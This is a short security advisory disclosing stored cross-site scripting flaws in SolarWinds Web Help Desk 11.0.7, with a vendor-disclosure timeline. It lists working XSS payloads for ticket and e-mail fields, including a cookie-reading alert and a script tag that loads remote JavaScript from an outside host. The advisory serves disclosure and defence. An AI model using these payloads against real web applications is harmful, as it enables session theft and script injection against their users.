# Author: loneferret of Offensive Security# Product: Web Help Desk by SolarWinds# Version: 11.0.7 (older versions may be affected)# Vendor Site: http://www.webhelpdesk.com# Software Download: http://www.webhelpdesk.com/help-desk-software/# Discovered: August 18th 2012# Disclosure:# August 19th 2012: Reported to CERT# August 24th 2012: Public disclosure date is October 8th 2012# August 28th 2012: Vendor responded, should fix by disclosure date# August 29th 2012: Vendor asked information on Stored XSS in 'Rejected E-Mail Section'# August 29th 2012: Sent vendor instructions on how to trigger XSS (not fully documented here)*# September 21 2012: Vendor sends pre-release version to test (11.0.8)# September 23 2012: Replied. Still XSS in "Rejected E-Mail Section' but not in Tickets# September 24 2012: Vendor replied saying "Rejected E-Mail" XSS slated to be fix in next version# October 8th 2012: Public release# Vulnerabilities:# Stored XSS via client web ticket submit system# Effected fields: Subject & Request Details# Payload: <script>alert(document.cookie);</script># Stored XSS via E-Mail# Tickets created automatically vis e-mail will also trigger the XSS when viewing.# Following payloads are triggered with default regular expression filters # Body field# Payloads:<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><iframe SRC="javascript:alert('XSS Body');"></iframe># Subject field# Payloads:<BODY ONLOAD=alert('XSS')>**<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><iframe SRC="javascript:alert('XSS Subject');"></iframe># *Viewing rejected e-mails via the 'email.eml' in the "Raw Message Data" section.# Some payloads:# <SCRIPT SRC=http://ha.ckers.org/xss.js># <XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'># **To trigger XSS must click on "My Tickets" or "Group Tickets"
